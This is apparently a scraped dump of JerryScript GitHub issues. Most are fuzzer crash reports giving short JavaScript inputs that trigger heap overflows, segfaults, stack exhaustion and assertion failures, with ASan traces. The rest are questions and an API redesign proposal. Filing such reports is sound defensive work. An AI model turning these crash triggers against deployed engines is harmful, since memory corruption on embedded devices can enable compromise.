0x3e9a05b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3e9a05c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3e9a05d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x3e9a05e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==32501==ABORTING
```
###### Expected behavior
not heap buffer overflow | heap-buffer-overflow in ecma_builtin_array_prototype_object_copy_within | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4204/comments | 1 | 2020-09-18T12:03:04Z | 2020-09-25T13:06:30Z | https://github.com/jerryscript-project/jerryscript/issues/4204 | 704,325,132 | 4,204 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
```
The master branch or git hash: c013fad
```
###### Build platform
```
Ubuntu 18.04.4 LTS Linux 4.15.0-74-generic x86_64
```
###### Build steps
```
Build with ASAN enabled:
python tools/build.py --compile-flag=-fsanitize=address --compile-flag=-g
```
###### Test case
```
a => AFL ; let a ; ! class extends a { } ; a = a => a ; a ++ ; a . a `a` ; export default a ; 'a' ; 'a' ; + eval `a` ; a = 1 ; for ( a in a ) a ; for ( let
```
###### Execution steps
```
src/build/bin/jerry poc.js
```
###### Output
```
==3997==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60f0000000e8 at pc 0x7ffff6ec9bb5 bp 0x7fffffffcd50 sp 0x7fffffffc4f8
READ of size 4 at 0x60f0000000e8 thread T0
#0 0x7ffff6ec9bb4 (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xafbb4)
#1 0x555555602095 in lexer_construct_literal_object /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-lexer.c:2450
#2 0x5555555c0477 in scanner_create_variables /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-scanner-util.c:2171
#3 0x55555560edab in parser_push_block_context /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser-statm.c:367
#4 0x555555613121 in parser_parse_for_statement_start /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser-statm.c:1533
#5 0x555555613121 in parser_parse_statements /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser-statm.c:2967
#6 0x5555555ba8c5 in parser_parse_source /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser.c:2304
#7 0x5555555bc12d in parser_parse_script /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser.c:2933
#8 0x555555573b39 in jerry_parse /home/user/Product/jerryscript/master/src/jerry-core/api/jerry.c:451
#9 0x55555556e42b in main /home/user/Product/jerryscript/master/src/jerry-main/main-unix.c:112
#10 0x7ffff6a4ab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#11 0x555555570f69 in _start (/home/user/Product/jerryscript/master/src/build/bin/jerry+0x1cf69)
0x60f0000000e8 is located 0 bytes to the right of 168-byte region [0x60f000000040,0x60f0000000e8)
allocated by thread T0 here:
#0 0x7ffff6ef8b40 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb40)
#1 0x55555561a80f in jerry_port_read_source /home/user/Product/jerryscript/master/src/jerry-port/default/default-module.c:58
#2 0x7ffff6a4ab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
SUMMARY: AddressSanitizer: heap-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xafbb4)
Shadow bytes around the buggy address:
0x0c1e7fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1e7fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1e7fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1e7fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c1e7fff8000: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
=>0x0c1e7fff8010: 00 00 00 00 00 00 00 00 00 00 00 00 00[fa]fa fa
0x0c1e7fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c1e7fff8060: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==3997==ABORTING
``` | heap-buffer-overflow in lexer_construct_literal_object in js-lexer.c | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4195/comments | 3 | 2020-09-14T15:32:25Z | 2021-01-18T14:35:34Z | https://github.com/jerryscript-project/jerryscript/issues/4195 | 701,209,875 | 4,195 |
[
"jerryscript-project",
"jerryscript"
]
| Hi - Is there a reason why jerry_char_t is typed to an uint8? Changing it to char generates tons of errors. The reason for asking is that it's causing me some problems for use with an RPC system where in the IDL 'string' (aka 'char') is something special
[edit] seems that it would be large change, dropping that | modify jerry_char_t to char instead on uint8 | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4193/comments | 0 | 2020-09-13T22:53:34Z | 2020-09-13T23:19:11Z | https://github.com/jerryscript-project/jerryscript/issues/4193 | 700,664,571 | 4,193 |
[
"jerryscript-project",
"jerryscript"
]
| According to ES6.0, the syntax *CharacterEscape* is extented at Annex B. *LegacyOctalEscapeSequence* is added in *CharacterEscape*. So the output of the tescase below is `/\04/`. And other engines (like V8, Chakracore, spiderMonkey) also give an output `/\04/`. Is this an issue of jerry? Or did I miss any information about this?
#### version
```
bd1c4df
```
#### command
```
jerryscript/build/bin/jerry testcase.js
```
#### testcase
```javascript
var v = function(){
return new RegExp("\\04");
};
var result = v();
print(result);
```
#### output
```
SynaxError: RegExp escape pattern error.
```
#### expected output
```
/\04/
```
contributor:[@YuanWangC](https://github.com/YuanWangC) | A question about RegExp syntax | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4192/comments | 1 | 2020-09-13T06:57:11Z | 2020-09-14T14:30:05Z | https://github.com/jerryscript-project/jerryscript/issues/4192 | 700,512,459 | 4,192 |
[
"jerryscript-project",
"jerryscript"
]
| ##### JerryScript revision
```
The master branch or git hash: c013fad
```
###### Build platform
```
Ubuntu 18.04.4 LTS Linux 4.15.0-74-generic x86_64
```
###### Build steps
```
Build with ASAN enabled:
python tools/build.py --compile-flag=-fsanitize=address --compile-flag=-g --strip=OFF
```
###### Test case
```
for ( a in a ) ; 'a' ; 'a' ; + eval `a` ; a = 1 ; for ( a in a ) a ; a = a => a ; a ++ ; a . a `a` ; export default a ; 'a' ; 'a' ; + eval `a` ; a = 1 ; for ( a in a ) a ; for ( let )
```
###### Execution steps
```
src/build/bin/jerry poc.js
```
###### Output
```
==6939==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61100000011e at pc 0x5555555c2e91 bp 0x7fffffffcb30 sp 0x7fffffffcb20
READ of size 1 at 0x61100000011e thread T0
#0 0x5555555c2e90 in lexer_convert_ident_to_cesu8 /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-lexer.c:2146
#1 0x5555555c34ca in lexer_convert_literal_to_chars /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-lexer.c:2200
#2 0x5555555c3bbd in lexer_construct_literal_object /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-lexer.c:2422
#3 0x5555555fe4d0 in scanner_create_variables /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-scanner-util.c:2171
#4 0x5555555c1184 in parser_push_block_context /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser-statm.c:367
#5 0x5555555d6746 in parser_parse_for_statement_start /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser-statm.c:1533
#6 0x5555555d6746 in parser_parse_statements /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser-statm.c:2967
#7 0x555555605563 in parser_parse_source /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser.c:2304
#8 0x555555605e83 in parser_parse_script /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser.c:2933
#9 0x555555613d4e in jerry_parse.constprop.28 /home/user/Product/jerryscript/master/src/jerry-core/api/jerry.c:451
#10 0x55555556c3ea in main /home/user/Product/jerryscript/master/src/jerry-main/main-unix.c:112
#11 0x7ffff6a4ab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#12 0x55555556d5d9 in _start (/home/user/Product/jerryscript/master/src/build/bin/jerry+0x195d9)
```
| heap buffer overflow in lexer_convert_ident_to_cesu8 in js-lexer.c | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4190/comments | 2 | 2020-09-11T15:49:04Z | 2021-01-18T14:38:00Z | https://github.com/jerryscript-project/jerryscript/issues/4190 | 699,472,147 | 4,190 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
```
The master branch or git hash: c013fad
```
###### Build platform
```
Ubuntu 18.04.4 LTS Linux 4.15.0-74-generic x86_64
```
###### Build steps
```
Build with ASAN enabled:
python tools/build.py --compile-flag=-fsanitize=address --compile-flag=-g --strip=OFF
```
###### Test case
```
1 ; export default await 1
```
###### Output
```
ASAN:DEADLYSIGNAL
=================================================================
==7178==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000004 (pc 0x55555558d55f bp 0x555555855110 sp 0x7fffffffde50 T0)
==7178==The signal is caused by a READ memory access.
==7178==Hint: address points to the zero page.
#0 0x55555558d55e in opfunc_resume_executable_object /home/user/Product/jerryscript/master/src/jerry-core/vm/opcodes.c:789
#1 0x555555599dc4 in ecma_process_promise_async_reaction_job /home/user/Product/jerryscript/master/src/jerry-core/ecma/operations/ecma-jobqueue.c:319
#2 0x555555599dc4 in ecma_process_all_enqueued_jobs /home/user/Product/jerryscript/master/src/jerry-core/ecma/operations/ecma-jobqueue.c:529
#3 0x55555556cb80 in jerry_run_all_enqueued_jobs /home/user/Product/jerryscript/master/src/jerry-core/api/jerry.c:626
#4 0x55555556cb80 in main /home/user/Product/jerryscript/master/src/jerry-main/main-unix.c:286
#5 0x7ffff6a4ab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#6 0x55555556d5d9 in _start (/home/user/Product/jerryscript/master/src/build/bin/jerry+0x195d9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/user/Product/jerryscript/master/src/jerry-core/vm/opcodes.c:789 in opfunc_resume_executable_object
==7178==ABORTING
``` | Invalid memory access (segfault) in opfunc_resume_executable_object in opcodes.c | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4189/comments | 1 | 2020-09-10T16:38:47Z | 2020-11-10T08:53:00Z | https://github.com/jerryscript-project/jerryscript/issues/4189 | 698,220,880 | 4,189 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
```
The master branch or git hash: c013fad
```
###### Build platform
```
Ubuntu 18.04.4 LTS Linux 4.15.0-74-generic x86_64
```
###### Build steps
```
Build with ASAN enabled:
python tools/build.py --compile-flag=-fsanitize=address --compile-flag=-g --strip=OFF
```
###### Test case
```
{ ; let a = a } ; export { } ; for ( let in
```
###### Output
```
ASAN:DEADLYSIGNAL
=================================================================
==18474==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000008 (pc 0x5555555f928e bp 0x7fffffffddb4 sp 0x7fffffffcf30 T0)
==18474==The signal is caused by a READ memory access.
==18474==Hint: address points to the zero page.
#0 0x5555555f928d in scanner_seek /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-scanner-util.c:370
#1 0x5555555d5981 in parser_parse_for_statement_start /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser-statm.c:1269
#2 0x5555555d5981 in parser_parse_statements /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser-statm.c:2967
#3 0x555555605563 in parser_parse_source /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser.c:2304
#4 0x555555605e83 in parser_parse_script /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-parser.c:2933
#5 0x555555613d4e in jerry_parse.constprop.28 /home/user/Product/jerryscript/master/src/jerry-core/api/jerry.c:451
#6 0x55555556c3ea in main /home/user/Product/jerryscript/master/src/jerry-main/main-unix.c:112
#7 0x7ffff6a4ab96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#8 0x55555556d5d9 in _start (/home/user/Product/jerryscript/master/src/build/bin/jerry+0x195d9)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/user/Product/jerryscript/master/src/jerry-core/parser/js/js-scanner-util.c:370 in scanner_seek
==18474==ABORTING
``` | Invalid memory access (segfault) in scanner_seek in js-scanner-util.c | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4188/comments | 2 | 2020-09-10T16:38:36Z | 2021-01-18T14:38:23Z | https://github.com/jerryscript-project/jerryscript/issues/4188 | 698,220,700 | 4,188 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
```
The master branch or git hash: c013fad
```
###### Build platform
```
Ubuntu 18.04.4 LTS Linux 4.15.0-74-generic x86_64
```
###### Build steps
```
Build with ASAN enabled:
python tools/build.py --compile-flag=-fsanitize=address --debug
```
###### Test case
```
a = new Proxy(String,[]);
a.__proto__ = a;
a[0]='a';
```
###### Output
```
ASAN:DEADLYSIGNAL
=================================================================
==8782==ERROR: AddressSanitizer: stack-overflow on address 0x7fff76a8bff8 (pc 0x556e089a90e2 bp 0x0000000003ed sp 0x7fff76a8c000 T0)
...... (omitted)
SUMMARY: AddressSanitizer: stack-overflow /home/user/Product/jerryscript/c013fad/src/jerry-core/ecma/operations/ecma-proxy-object.c:1226 in ecma_proxy_object_set
==7379==ABORTING
``` | stack-overflow in ecma_proxy_object_set in ecma-proxy-object.c | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4187/comments | 1 | 2020-09-09T14:14:45Z | 2020-09-15T09:58:45Z | https://github.com/jerryscript-project/jerryscript/issues/4187 | 696,853,005 | 4,187 |
[
"jerryscript-project",
"jerryscript"
]
| Since the last major release several new ECMAScript features have been implemented in the engine, some of these features however do not fit well with the current public API, especially proxies and modules. Several features also lack public API functions partially or even completely, and there are also inconsistencies with the naming scheme of several functions.
We would like to update the public API to address these issues and hopefully make it easier to use in the process.
We're also looking for feedback to help identify other parts of the API that could use improvement as well as the the newly proposed functions. If you have an opinion on the matter please feel free to comment.
### Naming scheme
We'd like to create a unified naming scheme for all API functions, where functions would be grouped by the type of the value they operate on, meaning all functions will take the `jerry_<operand-type>_<operation>` form. This should make the public API easier to navigate and use for embedders, and also make it easier to use code completion.
Here's an example of how the new grouping would look.
```c
Before: After:
jerry_get_string_size jerry_string_get_size
jerry_resolve_or_reject_promise jerry_promise_resolve_or_reject
jerry_get_promise_result jerry_promise_get_result
jerry_create_array jerry_array_create
jerry_has_property jerry_object_has
jerry_has_internal_property jerry_object_has_internal
jerry_init_property_descriptor_fields jerry_property_descriptor_init
jerry_free_property_descriptor_fields jerry_property_descriptor_free
jerry_call_function jerry_function_call
jerry_construct_object jerry_function_construct
jerry_create_arraybuffer jerry_arraybuffer_create
jerry_detach_arraybuffer jerry_arraybuffer_detach
jerry_get_arraybuffer_pointer jerry_arraybuffer_get_pointer
jerry_arraybuffer_read jerry_arraybuffer_read
```
### Reference counting functions
We would also like to address a minor naming issue with `jerry_acquire_value` and `jerry_release_value`. We feel like `acquire` and `release` are a poor choice of words as they can easly be misspelled. We would like to rename these to `jerry_value_copy` and `jerry_value_free` repectively (corresponding to the naming scheme defined above).
### String handling
We also feel string handling could be improved in general. Accessing raw contents of jerry strings can be awkward at times, as they need to be copied to external buffers, string API functions are also a bit convoluted with all the separate functions for different encodings.
First of all we'd like to simplify encoding handling by adding a new enum. This enum can be used as a function argument to select string encoding, and will allow us to reduce the number of required string functions. This should also come in handy for other function that operate on raw strings, for example JSON (#4160).
```c
typedef enum
{
JERRY_ENCODING_CESU8,
JERRY_ENCODING_UTF8,
} jerry_encoding_t;
```
We also propose a new string API that simplifies string handling and also allows directly accessing the contents of a jerry string, if the string type supports it:
```c
const jerry_string_t jerry_string_get (jerry_value_t string_value, jerry_encoding_t encoding);
void jerry_string_free (const jerry_string_t *string_p);
```
Where `jerry_string_t` is a structure containing a buffer pointer to the string contents, the size and length of the string, and some additional flags.
```c
typedef struct
{
const uint8_t *buffer_p;
uint32_t size;
uint32_t length;
uint32_t flags;
} jerry_string_t;
```
If the string type allows it the buffer can be used to directly access raw string data, otherwise a new buffer will be allocated automatically, which means it will no longer be necessary to allocate buffers externally.
We would also like to update how the current `jerry_string_to_char_buffer`, `jerry_substring_to_char_buffer`, and other variants work. The new function would look like the following:
```c
size_t jerry_string_to_buffer (jerry_value_t string_value,
uint8_t *buffer_p,
size_t buffer_size,
jerry_encoding_t encoding);
```
Previously if the buffer was not sufficiently large, `jerry_string_to_char_buffer` would not copy anything, and instead return with the required buffer size.
We would like to change this behaviour to always copy characters, and crop the string data to the external buffer size. The returned value would always be the number of bytes copied.
For substrings we feel a function which behaves similarly to the ECMAScript String.prototype.substring function would enough to handle all cases:
```c
jerry_value_t jerry_string_substr (jerry_value_t string, uint32_t start_index, uint32_t end_index);
```
The resulting string can then be accessed/copied to a buffer by using the previously defined functions.
### Unhandled features
There are some ECMAScript features that are lacking in native API functions, for example Date objects (#4058).
We'd like to go through the API and cover all such cases, proposals for these will come later.
### Source handling
Modules should be handled differently from regular Javascript sources, and they also need to have a correctly set resource name, otherwise the resolution logic can get confused. This will require additonal functions to handle module codes.
Proposal will come later.
### Misc
There are also previous proposals which should be considered: #2510 | API Update proposal | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4186/comments | 10 | 2020-09-08T15:08:26Z | 2022-01-29T08:28:47Z | https://github.com/jerryscript-project/jerryscript/issues/4186 | 695,956,302 | 4,186 |
[
"jerryscript-project",
"jerryscript"
]
| I'm a bit puzzled as what happens when using 32 bits float (-DJERRY_NUMBER_TYPE_FLOAT64=0) in various places like line 350 of ecma-helpers-conversion.c (and few other places). By default, when using GCC (I'm porting to the esp32 platform, so it's gcc), the root CMakeLists.txt set "conversion" as a warning and an error but obviously,
```
num = num * radix + (ecma_number_t) digit_value;
```
Produces an error as we are trying to represent a 32 bits int into a 4 bytes float, so we loose precision. I surely can change CMakeLists.txt or the code itself, but is there any preferred way before I submit my port? | Using 32 bits float and -Wconversion | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4183/comments | 3 | 2020-09-06T20:36:48Z | 2020-09-17T03:57:12Z | https://github.com/jerryscript-project/jerryscript/issues/4183 | 694,519,807 | 4,183 |
[
"jerryscript-project",
"jerryscript"
]
| My project has over a 10000 lines of javascript codes, it takes almost 13 seconds on ESP32(240Mhz) to load the codes from the internal flash, the snapshot will be very helpful for large projects, but unfortunately the modules doesn't support for snapshot, is it possible to add snapshot support for modules? Thanks | Module system snapshot support | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4167/comments | 6 | 2020-08-26T02:06:34Z | 2021-01-08T14:27:32Z | https://github.com/jerryscript-project/jerryscript/issues/4167 | 685,948,346 | 4,167 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
Identify the git hash(es) or tag(s) where the issue was observed.
2.4.0 (b828d1c1)
Hi there,
Does `jerry_json_parse()` only accept 'cesu-8' string?
Because emoji chars like '🌝' (<Buffer f0 9f 8c 9d>) might crash the process in my tests.
If only 'cesu-8' is supported, it will be great to add another `jerry_json_parse_from_utf8()`.
Thanks,
Clark | Question about jerry_json_parse() encoding | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4160/comments | 2 | 2020-08-21T14:42:14Z | 2021-12-06T20:25:26Z | https://github.com/jerryscript-project/jerryscript/issues/4160 | 683,611,113 | 4,160 |
[
"jerryscript-project",
"jerryscript"
]
|
Memory corruption in in opfunc_for_in (jerryscript/jerry-core/vm/opcodes.c:350)
###### JerryScript revision
commit : https://github.com/jerryscript-project/jerryscript/commit/5b3f01af9d3c134b90eaeefe1fb8a05e0a6c1464
version : v2.3.0
###### Build platform
Ubuntu 16.04.1 LTS (4.15.0-45-generic x86_64)
###### Build steps
```
python tools/build.py --profile=es2015-subset --lto=off --compile-flag=-g \
--strip=off --logging=on \
--compile-flag=-fsanitize=address --stack-limit=15
```
###### Test case
Memory_corruption_opfunc_for_in.js
```
function main() {
var v4 = [13.37,13.37,13.37,13.37];
var v6 = ["prototype",1337];
var v7 = [1337,v4,1337,"prototype",13.37,-4294967295,1337,-4294967295,1337,v6];
var v8 = {__proto__:v7,a:"prototype",b:v7,constructor:1337,d:v4,e:13.37,valueOf:v7};
var v9 = {c:Symbol,length:Symbol};
var v10 = v4;
var v13 = typeof BigInt;
var v17 = [13.37];
var v20 = typeof String;
var v21 = async (v22,v23,v24,v25) => {
var v28 = {apply:isFinite,call:isFinite,construct:isFinite,defineProperty:isFinite,getOwnPropertyDescriptor:isFinite,getPrototypeOf:isFinite,has:isFinite,ownKeys:isFinite,preventExtensions:isFinite,set:isFinite,setPrototypeOf:isFinite};
var v30 = new Proxy(isFinite,v28);
for (var v32 in v30) {
var v33 = {e:BigInt};
}
};
var v34 = v21(65535,v20,v17,v21);
var v35 = typeof BigInt;
var v36 = 0;
var v37 = 1;
var v38 = 1;
var v39 = /(.*)*Jae5y/m.test("-4096");
// Stderr:
}
main();
```
###### Execution steps
```
$ ls
Memory_corruption_opfunc_for_in.js
$ ../jerryscript/build/bin/jerry Memory_corruption_opfunc_for_in.js
ASAN:SIGSEGV
=================================================================
==83469==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x0000004556e2 bp 0x7ffdc4f6f300 sp 0x7ffdc4f6f210 T0)
#0 0x4556e1 in opfunc_for_in /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/opcodes.c:350
#1 0x45f253 in vm_loop /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/vm.c:3735
#2 0x4615ba in vm_execute /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/vm.c:4693
#3 0x46281f in vm_run /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/vm.c:4801
#4 0x427ad4 in ecma_op_function_call_simple /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:944
#5 0x428f8b in ecma_op_function_call /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1143
#6 0x461785 in opfunc_call /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/vm.c:779
#7 0x461785 in vm_execute /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/vm.c:4699
#8 0x46281f in vm_run /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/vm.c:4801
#9 0x427ad4 in ecma_op_function_call_simple /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:944
#10 0x428f8b in ecma_op_function_call /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1143
#11 0x461785 in opfunc_call /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/vm.c:779
#12 0x461785 in vm_execute /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/vm.c:4699
#13 0x46281f in vm_run /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/vm.c:4801
#14 0x406a59 in jerry_run /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/api/jerry.c:589
#15 0x4026db in main /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-main/main-unix.c:123
#16 0x7f784350c83f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#17 0x404238 in _start (/home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/build/bin/jerry+0x404238)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/opcodes.c:350 opfunc_for_in
==83469==ABORTING
```
```
$ ls
Memory_corruption_opfunc_for_in.js
$ ../jerryscript-noasan/build/bin/jerry Memory_corruption_opfunc_for_in.js
Segmentation fault (core dumped)
```
###### Backtrace
```
$ gdb -args ./build/bin/jerry Memory_corruption_opfunc_for_in.js
GNU gdb (Ubuntu 7.11.1-0ubuntu1~16.5) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from jerryscript/build/bin/jerry...done.
(gdb) r
Starting program: /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/build/bin/jerry crashes_out/Memory_corruption_opfunc_for_in.js
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Program received signal SIGSEGV, Segmentation fault.
0x00000000004556e2 in opfunc_for_in (left_value=left_value@entry=1235, result_obj_p=result_obj_p@entry=0x7fffffffdb80)
at /home/test/AST/fuzzilli/Targets/Jerryscript/out/jerryscript/jerry-core/vm/opcodes.c:350
350 if (prop_names_p->item_count != 0)
(gdb) x/3i $rip
=> 0x4556e2 <opfunc_for_in+87>: cmpl $0x0,(%rbx)
0x4556e5 <opfunc_for_in+90>: mov %r12,%rdi
0x4556e8 <opfunc_for_in+93>: je 0x45571d <opfunc_for_in+146>
(gdb) p/x $rbx
$1 = 0x0
(gdb)
``` | Memory corruption in in opfunc_for_in (jerryscript/jerry-core/vm/opcodes.c:350) | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4159/comments | 2 | 2020-08-21T02:48:08Z | 2020-08-28T10:46:36Z | https://github.com/jerryscript-project/jerryscript/issues/4159 | 683,217,691 | 4,159 |
[
"jerryscript-project",
"jerryscript"
]
| when I input `class A {}`, jerry-cli returns `Script Error: SyntaxError`
(can't work as `var A = class {}` too)
Linux-5.4.0-42-generic-x86_64-with-glibc2.29 | No class support | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4157/comments | 5 | 2020-08-19T08:49:10Z | 2020-08-19T09:43:37Z | https://github.com/jerryscript-project/jerryscript/issues/4157 | 681,663,333 | 4,157 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
086d1cc127f12e31ed315b41ca59ec0c3e88c7f4
(latest master - 2020.08.18.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test cases
test262-esnext test:
- language/module-code/eval-export-dflt-gen-named-semi.js
test case:
```
var count = 0;
export default function* g() {} if (true) { count += 1; }
```
###### Output
```
ICE: Assertion 'scope_stack_p >= context_p->scope_stack_p' failed at /home/oszi/jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_function_statement):735.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Expected behavior
not assert | Assertion 'scope_stack_p >= context_p->scope_stack_p' in parser_parse_function_statement | https://api.github.com/repos/jerryscript-project/jerryscript/issues/4150/comments | 1 | 2020-08-17T23:40:32Z | 2021-01-19T15:30:42Z | https://github.com/jerryscript-project/jerryscript/issues/4150 | 680,588,495 | 4,150 |
[
"jerryscript-project",
"jerryscript"
]
| ###### JerryScript revision
086d1cc127f12e31ed315b41ca59ec0c3e88c7f4
(latest master - 2020.08.18.)
###### Build platform
Ubuntu 18.04.5 LTS (Linux 4.15.0-112-generic x86_64)
###### Build steps
tools/build.py --debug --logging=on --error-messages=on --line-info=on
###### Test cases
test262-esnext test:
- language/eval-code/indirect/var-env-global-lex-non-strict.js
minimized test case:
```
let x;
(0,eval)('var x;');
```
###### Output
```
ICE: Assertion 'property_p == NULL || !(*property_p & ECMA_PROPERTY_FLAG_ENUMERABLE)' failed at /home/oszi/jerryscript/jerry-core/vm/vm.c(vm_loop):1377.
Error: ERR_FAILED_INTERNAL_ASSERTION
```
###### Expected behavior
